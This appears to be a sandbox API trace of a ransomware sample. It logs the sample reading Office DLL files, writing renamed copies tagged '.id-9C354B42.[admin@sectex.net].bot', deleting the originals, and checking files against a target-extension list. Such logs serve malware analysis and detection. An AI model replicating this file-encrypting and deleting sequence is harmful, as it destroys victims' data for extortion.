	[0056.072] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.072] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.073] GetLastError () returned 0x0
	[0056.073] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xd980, lpOverlapped=0x0) returned 1
	[0056.125] WriteFile (in: hFile=0x21c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xd990, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xd990, lpOverlapped=0x0) returned 1
	[0056.127] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.127] WriteFile (in: hFile=0x21c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xfa, lpOverlapped=0x0) returned 1
	[0056.127] SetEndOfFile (hFile=0x21c) returned 1
	[0056.127] CloseHandle (hObject=0x21c) returned 1
	[0056.128] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.128] SetEndOfFile (hFile=0x230) returned 1
	[0056.129] CloseHandle (hObject=0x230) returned 1
	[0056.129] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.129] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 1
	[0056.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.129] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.129] lstrlenW (lpString=".doc") returned 4
	[0056.129] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0056.129] lstrlenW (lpString=".docx") returned 5
	[0056.129] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0056.129] lstrlenW (lpString=".pdf") returned 4
	[0056.129] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0056.129] lstrlenW (lpString=".xls") returned 4
	[0056.129] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0056.129] lstrlenW (lpString=".xlsx") returned 5
	[0056.129] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0056.129] lstrlenW (lpString=".ppt") returned 4
	[0056.129] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.130] lstrlenW (lpString=".zip") returned 4
	[0056.130] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString=".rar") returned 4
	[0056.130] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString=".bz2") returned 4
	[0056.130] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString=".7z") returned 3
	[0056.130] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0056.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.130] lstrlenW (lpString=".dbf") returned 4
	[0056.130] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.130] lstrlenW (lpString=".1cd") returned 4
	[0056.130] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.130] lstrlenW (lpString=".jpg") returned 4
	[0056.130] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.130] lstrlenW (lpString=".doc") returned 4
	[0056.130] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString=".docx") returned 5
	[0056.130] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1
	[0056.130] lstrlenW (lpString=".pdf") returned 4
	[0056.130] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString=".xls") returned 4
	[0056.130] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString=".xlsx") returned 5
	[0056.130] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1
	[0056.130] lstrlenW (lpString=".ppt") returned 4
	[0056.130] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1
	[0056.130] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.130] lstrlenW (lpString=".zip") returned 4
	[0056.131] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1
	[0056.131] lstrlenW (lpString=".rar") returned 4
	[0056.131] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1
	[0056.131] lstrlenW (lpString=".bz2") returned 4
	[0056.131] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1
	[0056.131] lstrlenW (lpString=".7z") returned 3
	[0056.131] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0056.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.131] lstrlenW (lpString=".dbf") returned 4
	[0056.131] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1
	[0056.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.131] lstrlenW (lpString=".1cd") returned 4
	[0056.131] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1
	[0056.131] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80
	[0056.131] lstrlenW (lpString=".jpg") returned 4
	[0056.131] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1
	[0056.131] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0056.131] lstrlenW (lpString="MSSOAPR3.DLL") returned 12
	[0056.131] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0056.142] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=41864) returned 1
	[0056.142] CloseHandle (hObject=0x230) returned 1
	[0056.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 0x20
	[0056.142] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.142] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0056.142] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.142] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.143] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c
	[0056.143] GetLastError () returned 0x0
	[0056.143] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xa388, lpOverlapped=0x0) returned 1
	[0056.168] WriteFile (in: hFile=0x21c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xa390, lpOverlapped=0x0) returned 1
	[0056.169] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.169] WriteFile (in: hFile=0x21c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.169] SetEndOfFile (hFile=0x21c) returned 1
	[0056.170] CloseHandle (hObject=0x21c) returned 1
	[0056.170] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.170] SetEndOfFile (hFile=0x230) returned 1
	[0056.171] CloseHandle (hObject=0x230) returned 1
	[0056.171] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.171] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 1
	[0056.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.171] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.171] lstrlenW (lpString=".doc") returned 4
	[0056.171] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0056.171] lstrlenW (lpString=".docx") returned 5
	[0056.171] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1
	[0056.171] lstrlenW (lpString=".pdf") returned 4
	[0056.171] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0056.171] lstrlenW (lpString=".xls") returned 4
	[0056.171] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0056.171] lstrlenW (lpString=".xlsx") returned 5
	[0056.171] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1
	[0056.171] lstrlenW (lpString=".ppt") returned 4
	[0056.171] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.172] lstrlenW (lpString=".zip") returned 4
	[0056.172] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0056.172] lstrlenW (lpString=".rar") returned 4
	[0056.172] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0056.172] lstrlenW (lpString=".bz2") returned 4
	[0056.172] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0056.172] lstrlenW (lpString=".7z") returned 3
	[0056.172] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.172] lstrlenW (lpString=".dbf") returned 4
	[0056.172] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.172] lstrlenW (lpString=".1cd") returned 4
	[0056.172] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.172] lstrlenW (lpString=".jpg") returned 4
	[0056.172] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.172] lstrlenW (lpString=".doc") returned 4
	[0056.172] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0056.172] lstrlenW (lpString=".docx") returned 5
	[0056.172] lstrcmpiW (lpString1=".docx", lpString2="3.DLL") returned -1
	[0056.172] lstrlenW (lpString=".pdf") returned 4
	[0056.172] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0056.172] lstrlenW (lpString=".xls") returned 4
	[0056.172] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0056.172] lstrlenW (lpString=".xlsx") returned 5
	[0056.172] lstrcmpiW (lpString1=".xlsx", lpString2="3.DLL") returned -1
	[0056.172] lstrlenW (lpString=".ppt") returned 4
	[0056.172] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0056.172] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.172] lstrlenW (lpString=".zip") returned 4
	[0056.172] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0056.173] lstrlenW (lpString=".rar") returned 4
	[0056.173] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0056.173] lstrlenW (lpString=".bz2") returned 4
	[0056.173] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0056.173] lstrlenW (lpString=".7z") returned 3
	[0056.173] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0056.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.173] lstrlenW (lpString=".dbf") returned 4
	[0056.173] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0056.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.173] lstrlenW (lpString=".1cd") returned 4
	[0056.173] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0056.173] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL") returned 73
	[0056.173] lstrlenW (lpString=".jpg") returned 4
	[0056.173] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0056.173] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0056.173] lstrlenW (lpString="OARPMANR.DLL") returned 12
	[0056.173] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0056.174] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=11656) returned 1
	[0056.174] CloseHandle (hObject=0x230) returned 1
	[0056.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 0x20
	[0056.174] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0056.174] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.174] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.174] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0058.114] GetLastError () returned 0x0
	[0058.132] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x2d88, lpOverlapped=0x0) returned 1
	[0058.136] WriteFile (in: hFile=0x1c0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x2d90, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x2d90, lpOverlapped=0x0) returned 1
	[0058.137] ReadFile (in: hFile=0x230, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0058.137] WriteFile (in: hFile=0x1c0, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0058.137] SetEndOfFile (hFile=0x1c0) returned 1
	[0058.137] CloseHandle (hObject=0x1c0) returned 1
	[0058.137] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0058.137] SetEndOfFile (hFile=0x230) returned 1
	[0058.138] CloseHandle (hObject=0x230) returned 1
	[0058.138] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0058.138] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\oarpmanr.dll")) returned 1
	[0058.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.139] lstrlenW (lpString=".doc") returned 4
	[0058.139] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.139] lstrlenW (lpString=".docx") returned 5
	[0058.139] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0058.139] lstrlenW (lpString=".pdf") returned 4
	[0058.139] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.139] lstrlenW (lpString=".xls") returned 4
	[0058.139] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.139] lstrlenW (lpString=".xlsx") returned 5
	[0058.139] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0058.139] lstrlenW (lpString=".ppt") returned 4
	[0058.139] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.139] lstrlenW (lpString=".zip") returned 4
	[0058.139] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.139] lstrlenW (lpString=".rar") returned 4
	[0058.139] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.139] lstrlenW (lpString=".bz2") returned 4
	[0058.139] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.139] lstrlenW (lpString=".7z") returned 3
	[0058.139] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.139] lstrlenW (lpString=".dbf") returned 4
	[0058.139] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.139] lstrlenW (lpString=".1cd") returned 4
	[0058.139] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.139] lstrlenW (lpString=".jpg") returned 4
	[0058.139] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.139] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.139] lstrlenW (lpString=".doc") returned 4
	[0058.139] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0058.139] lstrlenW (lpString=".docx") returned 5
	[0058.140] lstrcmpiW (lpString1=".docx", lpString2="R.DLL") returned -1
	[0058.140] lstrlenW (lpString=".pdf") returned 4
	[0058.140] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0058.140] lstrlenW (lpString=".xls") returned 4
	[0058.140] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0058.140] lstrlenW (lpString=".xlsx") returned 5
	[0058.140] lstrcmpiW (lpString1=".xlsx", lpString2="R.DLL") returned -1
	[0058.140] lstrlenW (lpString=".ppt") returned 4
	[0058.140] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0058.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.140] lstrlenW (lpString=".zip") returned 4
	[0058.140] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0058.140] lstrlenW (lpString=".rar") returned 4
	[0058.140] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0058.140] lstrlenW (lpString=".bz2") returned 4
	[0058.140] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0058.140] lstrlenW (lpString=".7z") returned 3
	[0058.140] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0058.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.140] lstrlenW (lpString=".dbf") returned 4
	[0058.140] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0058.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.140] lstrlenW (lpString=".1cd") returned 4
	[0058.140] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0058.140] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\OARPMANR.DLL") returned 73
	[0058.140] lstrlenW (lpString=".jpg") returned 4
	[0058.140] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0058.140] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0058.140] lstrlenW (lpString="ACEEXCH.DLL") returned 11
	[0058.140] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230
	[0058.141] GetFileSizeEx (in: hFile=0x230, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=442272) returned 1
	[0058.141] CloseHandle (hObject=0x230) returned 1
	[0058.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll")) returned 0x20
	[0058.141] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEEXCH.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\aceexch.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
